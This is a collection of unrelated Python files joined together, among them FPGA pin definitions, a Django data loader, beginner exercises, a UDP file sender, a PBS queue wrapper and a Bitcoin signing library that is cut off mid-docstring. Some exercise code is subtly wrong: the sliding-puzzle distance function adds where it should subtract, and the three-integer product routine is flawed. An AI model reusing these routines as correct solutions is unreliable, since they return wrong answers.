GPIO(self, "PIO1_16", 102)
GPIO(self, "PIO1_17", 104)
GPIO(self, "PIO1_18", 105) # IRTXD
GPIO(self, "PIO1_19", 106) # IRRXD
GPIO(self, "PIO1_20", 107) # SD
# Bank 2
GPIO(self, "PIO2_10", 44)
GPIO(self, "PIO2_11", 45)
GPIO(self, "PIO2_12", 47)
GPIO(self, "PIO2_13", 48)
GPIO(self, "PIO2_14", 56)
GPIO(self, "PIO2_15", 60)
GPIO(self, "PIO2_16", 61)
GPIO(self, "PIO2_17", 62)
# Bank 3
GPIO(self, "PIO3_00", 21) # CLK
GPIO(self, "PIO3_01", 20) #
GPIO(self, "PIO3_02", 1) # DCD
GPIO(self, "PIO3_03", 2) # DSR / RESETQ
GPIO(self, "PIO3_04", 3) # DTR
GPIO(self, "PIO3_05", 4) # CTS
GPIO(self, "PIO3_06", 7) # RTS
GPIO(self, "PIO3_07", 8) # TXD
GPIO(self, "PIO3_08", 9) # RXD
# Configuration pins
#set_io CDONE 65
#set_io CRESET_B 66
#GPIO(self, "CDONE", 65)
#GPIO(self, "CRESET", 66)
def CT256(self):
self.package = 'CT256'
# Special
GPIO(self, "PIOS_00", "P12")
GPIO(self, "PIOS_01", "R12")
GPIO(self, "PIOS_02", "R11")
GPIO(self, "PIOS_03", "P11")
# Bank 0
GPIO(self, "PIO0_01", "B15")
GPIO(self, "PIO0_03", "B14")
GPIO(self, "PIO0_07", "A16")
GPIO(self, "PIO0_08", "A15")
GPIO(self, "PIO0_09", "B13")
GPIO(self, "PIO0_13", "B12")
GPIO(self, "PIO0_14", "B10")
GPIO(self, "PIO0_39", "B5")
GPIO(self, "PIO0_41", "B4")
GPIO(self, "PIO0_42", "A2")
GPIO(self, "PIO0_44", "A1")
GPIO(self, "PIO0_45", "C5")
GPIO(self, "PIO0_46", "C4")
GPIO(self, "PIO0_47", "B3")
GPIO(self, "PIO0_51", "C3")
# ...
# Bank 1
GPIO(self, "PIO1_01", "R15")
GPIO(self, "PIO1_03", "P15")
GPIO(self, "PIO1_04", "P16")
GPIO(self, "PIO1_05", "K15")
GPIO(self, "PIO1_06", "K14")
GPIO(self, "PIO1_07", "G14")
GPIO(self, "PIO1_08", "N16")
GPIO(self, "PIO1_09", "H16")
GPIO(self, "PIO1_12", "M16")
GPIO(self, "PIO1_14", "M15")
GPIO(self, "PIO1_16", "L16")
GPIO(self, "PIO1_18", "K14")
GPIO(self, "PIO1_19", "J15")
GPIO(self, "PIO1_20", "K15")
GPIO(self, "PIO1_21", "K16")
GPIO(self, "PIO1_22", "J14")
GPIO(self, "PIO1_28", "H16")
GPIO(self, "PIO1_29", "H14")
GPIO(self, "PIO1_30", "G16")
GPIO(self, "PIO1_32", "G15")
GPIO(self, "PIO1_34", "F16")
GPIO(self, "PIO1_36", "F15")
GPIO(self, "PIO1_37", "G14")
GPIO(self, "PIO1_38", "E16")
GPIO(self, "PIO1_40", "D16")
GPIO(self, "PIO1_42", "F14")
GPIO(self, "PIO1_44", "D15")
GPIO(self, "PIO1_46", "E14")
GPIO(self, "PIO1_47", "C16")
GPIO(self, "PIO1_49", "B16")
GPIO(self, "PIO1_51", "D14")
# ...
# Bank 2
GPIO(self, "PIO2_10", "P1")
GPIO(self, "PIO2_11", "N3")
GPIO(self, "PIO2_12", "M2")
GPIO(self, "PIO2_13", "L3")
GPIO(self, "PIO2_14", "K3")
GPIO(self, "PIO2_15", "J2")
GPIO(self, "PIO2_16", "H2")
GPIO(self, "PIO2_17", "G2")
# ...
# Bank 3
# ...
GPIO(self, "PIO3_26", "J3")
# Configuration pins
GPIO(self, "A16", "A16")
class ICE40HX1K(HX):
part = 'ice40hx1k'
def __init__(self, name='hx1k', board=None, package='tq144'):
assert package in ['vq100', 'tq144']
super(ICE40HX1K,self).__init__(name, board)
if package == 'tq144':
self.TQ144()
elif package == 'vq100':
self.VQ100()
class ICE40HX8K(HX):
part = 'ice40hx8k'
def __init__(self, name='hx8k', board=None, package='ct256'):
assert package in ['ct256']
super(ICE40HX8K,self).__init__(name, board)
if package == 'ct256':
self.CT256()
class LP(Lattice):
family = 'ice40'
def __init__(self, name, board):
super(LP,self).__init__(name, board)
self.clock = Clock(self)
self.USART = USART
def readpins(self, package):
dir = os.path.join(os.path.dirname(__file__), 'pins')
filename = os.path.join(dir,package+'.csv')
f = open(filename, 'r')
row = csv.reader(f)
'''
iCE40-LP8K-CM81
pin,bank,type,name
C2,3,IO,IOL_2A
'''
header = next(row)
for data in row:
if data[2] == 'IO':
#print(data[3], data[0])
GPIO(self, data[3], data[0])
def CM81(self):
self.package = 'CM81'
self.readpins('lp8kcm81')
class ICE40LP1K(LP):
part = 'ice40lp1k'
def __init__(self, name='lp1k', board=None, package='cm81'):
assert package in ['cm81']
super(ICE40LP1K,self).__init__(name, board)
if package == 'cm81':
self.CM81()
class ICE40LP8K(LP):
part = 'ice40lp8k'
def __init__(self, name='lp8k', board=None, package='cm81'):
assert package in ['cm81']
super(ICE40LP8K,self).__init__(name, board)
if package == 'cm81':
self.CM81()
# UltraScale Plus
class UP(Lattice):
family = 'ice40'
def readpins(self, package):
dir = os.path.join(os.path.dirname(__file__), 'pins')
filename = os.path.join(dir,package+'.csv')
f = open(filename, 'r')
row = csv.reader(f)
'''
iCE40-LP8K-CM81
name,type,bank,pair,UW30,SG48
IOB_0a,PIO,2,,E5,46
'''
header = next(row)
for data in row:
if data[1].startswith('PIO') \
or data[1].startswith('DPIO') \
or data[1].startswith('LED'):
#print(data[1], data[0])
if self.package == 'SG48' and data[5] != '-':
GPIO(self, data[0], data[5])
elif self.package == 'UW30' and data[6] != '-':
GPIO(self, data[0], data[6])
def SG48(self):
self.package = 'SG48'
self.readpins('up5k')
def UW30(self):
self.package = 'UW30'
self.readpins('up5k')
class ICE40UP5K(UP):
part = 'ice40up5k'
def __init__(self, name='up5k', board=None, package='sg48'):
assert package in ['sg48']
super(ICE40UP5K,self).__init__(name, board)
if package == 'sg48':
self.SG48()
|
import os
import sys
import django
# 单独使用django的model 也就是如何配置文件,可以直接连接数据库使用model导入数据
pwd = os.path.dirname(os.path.abspath(__file__))
sys.path.append(pwd+"../")
# 应用manage.py中的代码:将用到setting中的数据库的配置,因为我们要将category_data中的数据导入数据库
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "FoodMarket.settings")
django.setup()
# 这个必须放在os.environ.setdefault("DJANGO_SETTINGS_MODULE", "FoodMarket.settings")之后
# 因为当还没有把FoodMartket目录添加进来,也还没有把setting文件当做为django默认setting文件
from db_tools.data.category_data import row_data
from goods.models import GoodsCategory
for category1 in row_data:
instance1 = GoodsCategory()
instance1.name = category1["name"]
instance1.code = category1["code"]
instance1.category_type = 1
instance1.save()
for category2 in category1["sub_categorys"]:
instance2 = GoodsCategory()
instance2.name = category2["name"]
instance2.code = category2["code"]
instance2.parent_category = instance1
instance2.category_type = 2
instance2.save()
for category3 in category2["sub_categorys"]:
instance3 = GoodsCategory()
instance3.name = category3["name"]
instance3.code = category3["code"]
instance3.parent_category = instance2
instance3.category_type = 3
instance3.save()
|
# Given a list_of_ints, find the highest_product you can get from three of the integers.
# The input list_of_ints will always have at least three integers.
list_of_ints = [2, -5, -1, -17, -8 , 1, 21, 200]
def highest_product_of_3(input):
selected = [input[0],input[1],input[2]]
product = selected[0] * selected[1] * selected [2]
i = 3
while i < len(input):
if input[i] * selected[1] * selected [2] > product:
selected[0] = input[i]
elif selected[0] * input[i] * selected [2] > product:
selected[1] = input[i]
elif selected[0] * selected [1] * input[i] > product:
selected[2] = input[i]
product = selected[0] * selected[1] * selected [2]
i += 1
print selected
return product
print highest_product_of_3(list_of_ints)
# Same as above, but with k integers instead of 3
"""
def highest_product_of_k(input, k):
return product
""" |
# section06 / 01-obj1.py
# 클래스 선언
class Member1:
userid = "python"
email = "webmaster@soldesk.com"
phone = "01012345678"
# 객체 선언
mem1 = Member1()
print(mem1.userid)
print(mem1.email)
print(mem1.phone)
# 객체 선언
mem2 = Member1()
print(mem2.userid)
print(mem2.email)
print(mem2.phone)
print()
# 함수를 내장하는 클래스 정의
# 클래스에 포함되는 함수들은 반드시 첫번째 파라미터에 self를 정의해야 함
class Calc:
def plus(self, x, y):
return x+y
def minus(self, x, y):
return x-y
def all(self, x, y):
a = self.plus(x, y)
b = self.minus(x, y)
return (a, b) # 튜플로 묶어서 여러개의 값을 한번에 리턴
cal = Calc()
print(cal.plus(5, 3))
print(cal.minus(5, 3))
a = cal.all(10, 20)
print(a)
p, m = cal.all(100, 200)
print(p, m)
print()
# 변수와 함수를 모두 내장하는 클래스 정의
class Member:
username = ""
email = ""
def join(self, username, email):
self.username = username
self.email = email
def view_info(self):
print(self.username)
print(self.email)
mem1 = Member()
mem1.join("python", "webmaster@soldesk.com")
mem1.view_info()
|
#!/usr/bin/env python
"""Run nosetests in the diesel event loop.
You can pass the same command-line arguments that you can pass to the
`nosetests` command to this script and it will execute the tests in the
diesel event loop. This is a great way to test interactions between various
diesel green threads and network-based applications built with diesel.
"""
import diesel
import nose
from diesel.logmod import LOGLVL_ERR, Logger
class QuietApplication(diesel.Application):
"""A diesel Application that doesn't log as much.
This keeps diesel from spewing its own status to stdout and lets nose
run the show.
"""
def __init__(self):
log = Logger(verbosity=LOGLVL_ERR)
super(QuietApplication, self).__init__(logger=log)
def main():
app = QuietApplication()
app.add_loop(diesel.Loop(nose.main))
app.run()
if __name__ == '__main__':
main()
|
"""Removes unused functions."""
def reachable(func, reachable_funcs, id_to_func):
"""Recursively mark functions reachable from func."""
reachable_funcs.add(func)
for inst in func.instructions():
if inst.op_name == 'OpFunctionCall':
called_func = id_to_func[inst.operands[0]]
if called_func not in reachable_funcs:
reachable(called_func, reachable_funcs, id_to_func)
def run(module):
"""Remove all unused functions."""
id_to_func = {}
for func in module.functions:
id_to_func[func.inst.result_id] = func
reachable_funcs = set()
for inst in module.global_instructions.op_entry_point_insts:
reachable(id_to_func[inst.operands[1]],
reachable_funcs,
id_to_func)
for func in module.functions[:]:
if func not in reachable_funcs:
func.destroy()
|
# coding:utf-8
__author__ = 'cwang14'
from queue import PriorityQueue
from typing import List
class Solution:
def Manhattan(self, s1, s2):
'''估值函数'''
dist = 0 # 所有元素距离他们应该在的位置的距离之和作为估值指标
for i1, d in enumerate(s1):
i2 = s2.index(d)
dist += abs(i1 // 3 - i2 // 3) + abs(i1 % 3 + i2 % 3)
return dist
def slidingPuzzle(self, board: List[List[int]]) -> int:
# 向量模版
# [0,1,2]
# [3,4,5]
v_map = [(1, 3), (0, 2, 4), (1, 5), (0, 4), (3, 1, 5), (2, 4)]
start_q = PriorityQueue()
start_q.put((0, (''.join(str(e) for row in board for e in row), 0)))
used = [''.join(str(e) for row in board for e in row)]
while not start_q.empty():
_, q = start_q.get()
if q[0] == '123450': return q[1]
zero_index = q[0].index('0')
for index in v_map[zero_index]:
_q, count = q[0][:], q[1]
_q = list(_q)
_q[zero_index], _q[index] = _q[index], _q[zero_index]
_q = ''.join(_q)
if _q not in used:
priority = self.Manhattan(_q, '123450')
# 放入结果和其估值(其估值需要考虑进之前走的步数)
start_q.put((count + 1 + priority, (_q, count + 1)))
used.append(_q)
return -1
|
class Animal(object):
def __init__(self, name, health):
self.name = name
self.health = health
print self.name
def walk(self):
self.health -= 1
return self
def run(self):
self.health -= 5
return self
def display_health(self):
print self.health
class Dog(Animal):
def __init__(self, name):
super(Dog, self).__init__(name, 150)
#print self.name
def pet(self):
self.health += 5
return self
class Dragon(Animal):
def __init__(self, name):
super(Dragon, self).__init__(name, 170)
def fly(self):
self.health -= 10
return self
def display_health(self):
print self.health
print "I am a Dragon"
print("\n")
dragon1 = Dragon("Droch")
dragon1.fly().fly().fly().display_health()
print("\n")
animal1 = Animal("Zeb", 100)
animal1.walk().walk().walk().run().run().display_health()
print("\n")
dog1 = Dog("Gibbs")
dog1.walk().walk().walk().run().run().pet().display_health() |
import sys
import os
import gitmer
repos_lst_file = sys.argv[1]
mappingscache_xml_file = sys.argv[2]
f = open(repos_lst_file, "r")
repos = []
for x in f.readlines():
x = x.strip('\r')
x = x.strip('\n')
repos.append(x)
f.close()
if os.path.isfile(mappingscache_xml_file):
mappings = gitmer.generate_mappings(repos, mappingscache_xml_file)
else:
mappings = gitmer.generate_mappings(repos)
f = open(mappingscache_xml_file, "w+")
f.write(mappings)
f.close()
|
import pandas as pd
colnames = ["SectorStatID", "SectorStatName", "PersID", "Age", "GenderID", "GenderName", "HouseholdID", "HouseholdTypeID", "HouseholdTypeName", "WorkerID", "WorkerType", "WorkSectorStatID", "WorkSectorStatName"]
student = pd.DataFrame(columns=colnames)
unif_fr = pd.read_csv('unif_fr_hors_bxl_to_bxl_v2.csv', sep=";")
#unif_fr.set_index("Libellé commune de l'implantation", inplace = True, drop = True)
print(unif_fr)
closest_peri = pd.read_csv('closest_ss_peri_v2.csv')
closest_peri.set_index("SectorStatID", inplace=True, drop=True)
print(closest_peri)
ss_names = pd.read_csv('sector_stat.csv', sep=";")
ss_names.set_index("Code", inplace=True, drop=True)
print(ss_names)
#etudiant from bxl to bxl fr
ss = pd.read_csv('campus_fr_ss_commune.csv')
ss.drop(columns=["Unnamed: 0"], inplace=True)
#ss.set_index("SectorStat", inplace=True, drop=True)
print(ss)
communes = ss.Commune
dic = dict()
for com in communes:
list_ss = ss[ss.Commune == com].SectorStat.tolist()
dic[com]=list_ss #len(ss[ss.Commune==com])
print(dic)
i=0
for ind in unif_fr.index:
print("ind", ind)
if unif_fr.loc[ind, "Sexe"] == "Femme":
sex = 1
elif unif_fr.loc[ind, "Sexe"] == "Homme":
sex = 0
else:
errorsex
if sex == 0:
gender_name = 'male'
elif sex == 1:
gender_name = 'female'
else:
errorSexName
age = unif_fr.loc[ind, "Age"]
nb = unif_fr.loc[ind, "Sum of Compte"]
com_to = unif_fr.loc[ind, "Commune"]
list_ss_to = dic[com_to]
nb_per_ss = round(nb/len(list_ss_to))
reste = nb%len(list_ss_to)
first_ss = True
for ss in list_ss_to:
print("ss", ss)
ss_from_id = closest_peri.loc[ss]
if type(ss_from_id)!=str:
ss_from_id = ss_from_id[0]
ss_from_name = ss_names.loc[ss_from_id, "Name"]
ss_to_name = ss_names.loc[ss, "Name"]
if first_ss:
nb_per_ss_tmp = nb_per_ss + reste
first_ss = False
else:
nb_per_ss_tmp = nb_per_ss
while nb_per_ss_tmp > 0:
print("i", i)
student.loc[i]=[ss_from_id, ss_from_name, i, "Useless for non resident but "+str(age), "Useless for non resident but "+str(gender_name), "Useless for non resident", "Useless for non resident", "Useless for non resident", "Useless for non resident", 5, "Unif off campus", ss, ss_to_name]
nb_per_ss_tmp -=1
i+=1
print(student)
student.to_csv("foreign_student_workplace.csv") |
"""empty message
Revision ID: 5c5792caf593
Revises: 13a3da0db2d2
Create Date: 2016-03-12 16:14:17.557226
"""
# revision identifiers, used by Alembic.
revision = '5c5792caf593'
down_revision = '13a3da0db2d2'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table('admin_fee',
sa.Column('object_id', sa.Integer(), nullable=False),
sa.Column('amount', sa.Integer(), nullable=False),
sa.Column('reason', sa.UnicodeText(), nullable=False),
sa.Column('paid', sa.Boolean(), nullable=False),
sa.Column('charged_to_id', sa.Integer(), nullable=False),
sa.Column('charged_by_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['charged_by_id'], [u'user.object_id'], ),
sa.ForeignKeyConstraint(['charged_to_id'], [u'user.object_id'], ),
sa.PrimaryKeyConstraint('object_id')
)
op.create_table('admin_fee_transaction_item',
sa.Column('object_id', sa.Integer(), nullable=False),
sa.Column('is_refund', sa.Boolean(), nullable=False),
sa.Column('admin_fee_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['admin_fee_id'], [u'admin_fee.object_id'], ),
sa.ForeignKeyConstraint(['object_id'], [u'transaction_item.object_id'], ),
sa.PrimaryKeyConstraint('object_id')
)
op.add_column(u'log', sa.Column('admin_fee_id', sa.Integer(), nullable=True))
op.create_foreign_key(None, 'log', 'admin_fee', ['admin_fee_id'], ['object_id'])
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_constraint(None, 'log', type_='foreignkey')
op.drop_column(u'log', 'admin_fee_id')
op.drop_table('admin_fee_transaction_item')
op.drop_table('admin_fee')
### end Alembic commands ###
|
import os
import sys
import socket
import select
import time
# Get user input
gammaIP = str(sys.argv[1])
gammaPort = int(sys.argv[2])
trollPort= int(sys.argv[3])
fileName = str(sys.argv[4])
# Defining Cnstants
timeout = 1.5
HOST = ''
PORT = 4001
header = b''
data = b''
flag = 1
sequenceNumber = 0
CHUNK_SIZE = 1000
gammaIPb = gammaIP.split('.')
i = 0
# Setting up the client socket on localhost with port 4001
clientSocket = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
clientSocket.bind((HOST,PORT))
# Placeholder for required params see https://docs.python.org/2/library/select.html
wlist = []
xlist = []
# System call to obtain filesize
size = os.stat(fileName).st_size
# Create header from remote IP and remote Port that will begin every segment
while i < len(gammaIPb):
integer = int(gammaIPb[i])
header = header + integer.to_bytes(1, 'big')
i = i + 1
header = header + gammaPort.to_bytes(2, 'big')
# Create first datagram to be sent
print('Sending first segment...')
data = header + flag.to_bytes(1, 'big') + sequenceNumber.to_bytes(1,'big') + size.to_bytes(4, 'big')
clientSocket.sendto(data, (gammaIP, trollPort))
while 1:
readList, writeList, errorList = select.select([clientSocket], wlist, xlist, timeout)
ack = int.from_bytes(readList[0].recv(1), 'big')
if ack != sequenceNumber:
print('Resending first segment...')
clientSocket.sendto(data, (gammaIP, trollPort))
else:
print('Segment 1 acknowledged!')
flag = 2
if sequenceNumber == 1:
sequenceNumber = 0
else:
sequenceNumber = 1
break
print('Sending second segment...')
data = header + flag.to_bytes(1, 'big') + sequenceNumber.to_bytes(1,'big') + fileName.encode('utf-8')
clientSocket.sendto(data, (gammaIP, trollPort))
while 1:
readList, writeList, errorList = select.select([clientSocket], wlist, xlist, timeout)
ack = int.from_bytes(readList[0].recv(1), 'big')
if ack != sequenceNumber:
print('Resending second segment...')
clientSocket.sendto(data, (gammaIP, trollPort))
else:
print('Segment 2 acknowledged!')
flag = 3
if sequenceNumber == 1:
sequenceNumber = 0
else:
sequenceNumber = 1
break
print('Sending file...')
file = open(fileName,'rb')
while 1:
chunk = file.read(CHUNK_SIZE)
if chunk:
data = header + flag.to_bytes(1, 'big') + sequenceNumber.to_bytes(1,'big') + chunk
clientSocket.sendto(data, (gammaIP, trollPort))
while 1:
readList, writeList, errorList = select.select([clientSocket], wlist, xlist, timeout)
ack = int.from_bytes(readList[0].recv(1), 'big')
if ack != sequenceNumber:
print('Resending third segment...')
clientSocket.sendto(data, (gammaIP, trollPort))
else:
print('Segment 3 acknowledged!')
break
if sequenceNumber == 1:
sequenceNumber = 0
else:
sequenceNumber = 1
else:
break;
clientSocket.close()
file.close()
print('File transfer completed')
|
#!/usr/bin/env python
'''
this module will submit a job to the queue when a calculation is called.
Use this in a script like this:
from ase import *
from Jacapo import *
from htp.queue_qn import *
Jacapo.qsuboptions = '-l cput=23:00:00,mem=499mb -joe -p -1024'
Jacapo.calculation_required = calculation_required
Jacapo.calculate = queue_qn
Jacapo.qnrelax_tags = [0,1,2]
author:: John Kitchin <jkitchin@andrew.cmu.edu>
'''
import exceptions
import commands, os, string, sys, time
from torque.torque import *
from ase import *
from ase.calculators.jacapo import *
from Scientific.IO.NetCDF import NetCDFFile
class DacapoAborted(exceptions.Exception):
def __init__(self,args=None):
self.args = args
def __str__(self):
return string.join(self.args,'')
class DacapoNotFinished(exceptions.Exception):
def __init__(self,args=None):
self.args = args
def __str__(self):
return string.join(self.args,'')
def calculation_required(self, atoms=None, quantities=None):
#we need to overwrite this method so calculate always gets called
return True
def queue_qn(self,*args,**kwargs):
'''
this will replace the calculate method of the Jacapo Calculator
and run a job through the queue.
'''
CWD = os.getcwd()
wholencfile = self.get_nc()
basepath,NCFILE = os.path.split(wholencfile)
basename,ext = os.path.splitext(NCFILE)
TXTFILE = basename + '.txt'
runningfile = NCFILE + '.running'
stopfile = NCFILE + '.stop'
JOBFILE = basename + '.job_sh'
JOBIDFILE = basename + '.jobid'
if basepath is not '':
#print 'changing to %s' % basepath
os.chdir(basepath)
#print os.getcwd(), NCFILE
atoms = Jacapo.read_atoms(NCFILE)
self = atoms.get_calculator()
#print self
if self.get_status() == 'finished':
#this means the job is done.
#do some clean-up of unimportant files
for jfile in [JOBFILE,
JOBIDFILE,
runningfile,
stopfile]:
if os.path.exists(jfile): os.remove(jfile)
#slave files from parallel runs
import glob
slvpattern = TXTFILE + '.slave*'
for slvf in glob.glob(slvpattern):
os.unlink(slvf)
#exit so that we can move on.
os.chdir(CWD)
return True
#Past here means we have to check if the calculation is running
if os.path.exists(JOBIDFILE):
JOBID = open(JOBIDFILE).readline()
else:
JOBID = None
# get a queue object
pbs = PBS()
pbs.fastpoll()
if JOBID is not None:
jobnumber,beowulf = JOBID.split('.')
#the job has been submitted before, and we need
#to find out what the status of the jobid is
for job in pbs:
if job['Job Id'] == JOBID:
if job['job_state'] == 'R':
os.chdir(CWD)
raise JobRunning, job['job_state']
elif job['job_state'] == 'Q':
os.chdir(CWD)
raise JobInQueue, job['job_state']
elif job['job_state'] == 'C':
#this means the queue thinks the job is done
#but has not purged it yet. we should pass
#usually you should not get here if the job
#is actually finished because teh function
#would exit above.
raise JobDone, job['job_state']
else:
os.chdir(CWD)
raise UnknownJobStatus, job['job_state']
# if you get here, the job is not in the queue anymore
# getting here means the job was not finished, and is not in
# the queue anymore, or that the queue has not flushed it yet.
OUTPUTFILE = JOBFILE + '.o' + jobnumber
#lets see if there is anything in the output file
f = open(OUTPUTFILE)
for line in f:
if "=>> PBS: job killed: cput" in line:
raise PBS_CputExceeded(line)
elif 'Terminated' in line:
raise PBS_Terminated(line)
#check output of Dacapo
f = open(TXTFILE,'r')
for line in f:
if 'abort_calc' in line:
f.close()
os.chdir(CWD)
raise DacapoAborted, line
continue
f.close()
#check last line for proper finish
if not ('clexit: exiting the program' in line
or 'PAR: msexit halting Master' in line):
os.chdir(CWD)
print self.get_nc()
raise DacapoNotFinished, line
# something else must be wrong
os.chdir(CWD)
raise Exception,'something is wrong with your job!'
#Past here, we need to submit a job.
job = '''\
#!/bin/tcsh
cd $PBS_O_WORKDIR
qn_relax -t %(qntags)s %(ncfile)s
stripnetcdf %(ncfile)s
#end
''' % {'qntags':string.join([str(t) for t in self.qnrelax_tags],','),
'ncfile':NCFILE}
f = open(JOBFILE,'w')
f.write(job+'\n')
f.close()
os.chmod(JOBFILE,0777)
#now we know we have to submit our job
cmd = 'qsub -j oe %s %s' % (self.qsuboptions,JOBFILE)
status,output = commands.getstatusoutput(cmd)
if status == 0:
f = open(JOBIDFILE,'w')
f.write(output)
f.close()
os.chdir(CWD)
raise JobSubmitted, output
else:
print status, output
os.chdir(CWD)
raise Exception, 'Something is wrong with the qsub output'
## # now check if it finished correctly
## atoms = Jacapo.read_atoms(NCFILE)
## self = atoms.get_calculator()
## #check for dacapo errors
## TXTFILE = basename + '.txt'
## f = open(TXTFILE,'r')
## for line in f:
## if 'abort_calc' in line:
## f.close()
## os.chdir(CWD)
## raise DacapoAborted, line
## continue
## f.close()
## if not ('clexit: exiting the program' in line
## or 'PAR: msexit halting Master' in line):
## os.chdir(CWD)
## raise DacapoNotFinished, line
## stopfile = NCFILE + '.stop'
## if os.path.exists(stopfile):
## os.unlink(stopfile)
## runningfile = NCFILE + '.running'
## if os.path.exists(runningfile):
## os.unlink(runningfile)
## #slave files from parallel runs
## import glob
## slvpattern = TXTFILE + '.slave*'
## for slvf in glob.glob(slvpattern):
## print 'deleting %s' % slv
## os.unlink(slvf)
## os.chdir(CWD)
return 0
|
# Exercise 6, string formatting and regular expressions
import re
import os
script_dir = os.path.dirname(__file__)
rel_path = "postcodes.txt"
abs_file_path = os.path.join(script_dir, rel_path)
infile = open(abs_file_path, 'r')
valid_file_path = os.path.join(script_dir, 'validpc.txt')
valid = open(valid_file_path).read().splitlines()
validpc = dict()
for txt in valid:
kv = txt.split(",")
validpc[kv[0]] = kv[1]
# Variables for counting valid and invalid codes (part b)
valid = 0
invalid = 0
for postcode in infile:
# The variable 'postcode' contain the line read from the file
# Ignore empty lines
if postcode.isspace():
continue
# TODO (a): Remove newlines, tabs and spaces
postcode = re.sub(r"\s", "", postcode)
# TODO (a): Convert to uppercase
postcode = postcode.upper()
# TODO (a): Insert a space before the final digit and 2 letters
postcode = re.sub(r"(\d\w\w)$", r" \1", postcode)
# Print the reformatted postcode
print(postcode)
# TODO (b) Validate the postcode, returning a match object 'm'
m = re.search(r"^[A-Z]{1,2}\d{1,2}[A-Z]? \d[A-Z]{2}$", postcode)
if m:
valid = valid + 1
if (postcode.split(' '))[0] in validpc:
country = validpc[(postcode.split(' '))[0]]
print(f"Postcode: {postcode} is from {country}")
else:
print(f"Postcode: {postcode} not found!")
else:
invalid = invalid + 1
infile.close()
# TODO (b) Print the valid and invalid totals
print(f"Valid:{valid} Invalid:{invalid}")
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import base64
from binascii import hexlify, unhexlify
try:
ModuleNotFoundError
except:
ModuleNotFoundError = ImportError
try:
from .ecmath import *
from .hexhashes import *
from .base58 import *
from .miscfuncs import *
from .miscbitcoinfuncs import *
from .bitcoin import *
from .rfc6979 import generate_k
except Exception as e:
if type(e) != ImportError and \
type(e) != ModuleNotFoundError and \
type(e) != ValueError and \
type(e) != SystemError:
raise Exception("Unknown problem with imports.")
from ecmath import *
from hexhashes import *
from base58 import *
from miscfuncs import *
from miscbitcoinfuncs import *
from bitcoin import *
from rfc6979 import generate_k
def sign(hash,priv,k=0):
'''
Returns a DER-encoded signature from a input of a hash and private
key, and optionally a K value.
Hash and private key inputs must be 64-char hex strings,
k input is an int/long.
>>> h = 'f7011e94125b5bba7f62eb25efe23339eb1637539206c87df3ee61b5ec6b023e'
>>> p = 'c05694a7af0e01dceb63e5912a415c28d3fc823ca1fd3fa34d41afde03740466'
>>> k = 4 # chosen by fair dice roll, guaranteed to be random
>>> sign(h,p,k)
'3045022100e493dbf1c10d80f3581e4904930b1404cc6c13900ee0758474fa94abe8c4cd130220598e37e2e66277ef4d0caf0e32d095debb3c744219508cd394b9747e548662b7'
'''
if k == 0:
k = generate_k(priv, hash)
hash = int(hash,16)
priv = int(priv,16)
r = int(privtopub(dechex(k,32),True)[2:],16) % N
s = ((hash + (r*priv)) * modinv(k,N)) % N
# High S value is non-standard (soon to be invalid)
if s > (N / 2):
s = N - s
r, s = inttoDER(r), inttoDER(s)
olen = dechex(len(r+s)//2,1)
return '30' + olen + r + s
def verify(hash,sig,pub,exceptonhighS=False):
'''
Verify a DER-encoded signature against a given hash and public key
No checking of format is done in this function, so the signature
format (and other inputs) should be verified as being the correct
format prior to using this method.
Hash is just 64-char hex string
Public key format can be verified with validatepubkey() which is
found in .bitcoin
Signature format can be validated with checksigformat() which is
the next function after this
'exceptonhighS' is available because many Bitcoin implementations
will soon be invalidating high S values in signatures, in order
to reduce transaction malleability issues. I decided an exception
was preferable to returning False, so as to be distinct from a bad
signature.
>>> h = 'f7011e94125b5bba7f62eb25efe23339eb1637539206c87df3ee61b5ec6b023e'
>>> sig = '3045022100e493dbf1c10d80f3581e4904930b1404cc6c13900ee0758474fa94abe8c4cd130220598e37e2e66277ef4d0caf0e32d095debb3c744219508cd394b9747e548662b7'
>>> pub = '022587327dabe23ee608d8504d8bc3a341397db1c577370389f94ccd96bb59a077'
>>> verify(h,sig,pub)
True
>>> sig = '3046022100e493dbf1c10d80f3581e4904930b1404cc6c13900ee0758474fa94abe8c4cd13022100a671c81d199d8810b2f350f1cd2f6a1fff7268a495f813682b18ea0e7bafde8a'
>>> verify(h,sig,pub)
True
>>> verify(h,sig,uncompress(pub))
True
>>> verify(h,sig,pub,True)
Traceback (most recent call last):
...
TypeError: High S value.
'''
rlen = 2*int(sig[6:8],16)
r = int(sig[8:8+(rlen)],16)
s = int(sig[(12+rlen):],16) # Ignoring s-len; format dictates it
# will be to the end of string
assert r < N
if exceptonhighS:
if s > (N / 2):
raise TypeError("High S value.")
w = modinv(s,N)
x = int(addpubs(
privtopub(dechex((int(hash,16) * w) % N,32),False),
multiplypub(pub,dechex((r*w) % N,32),False),
False)[2:66],16)
return x==r
def checksigformat(a,invalidatehighS=False):
'''
Checks input to see if it's a correctly formatted DER Bitcoin
signature in hex string format.
Returns True/False. If it excepts, there's a different problem
unrelated to the signature...
This does NOT valid the signature in any way, it ONLY checks that
it is formatted properly.
If invalidatehighS is True, this function will return False on an
otherwise valid signature format if it has a high S value.
'''
try:
a = hexstrlify(unhexlify(a))
except:
return False
try:
rlen = 2*int(a[6:8],16)
slen = 2*int(a[(10+rlen):(12+rlen)],16)
r = a[8:8+(rlen)]
s1 = a[(12+rlen):]
s2 = a[(12+rlen):(12+rlen+slen)]
assert s1 == s2
s1 = int(s1,16)
assert s1 < N
assert a[:2] == '30'
assert len(a) == ((2*int(a[2:4],16)) + 4)
assert a[4:6] == '02'
assert a[(8+rlen):(10+rlen)] == '02'
if int(dechex(int(r,16))[:2],16) > 127:
assert r[:2] == '00'
assert r[2:4] != '00'
else:
assert r[:2] != '00'
if int(dechex(s1)[:2],16) > 127:
assert s2[:2] == '00'
assert s2[2:4] != '00'
else:
assert s2[:2] != '00'
assert len(r) < 67
assert len(s2) < 67
except AssertionError:
return False
except Exception as e:
raise Exception(str(e))
if invalidatehighS:
if s1 > (N / 2):
return False
return True
def signmsg(msg,priv,iscompressed,k=0):
'''
Sign a message -- the message itself, not a hash -- with a given
private key.
Input private key must be hex, NOT WIF. Use wiftohex() found in
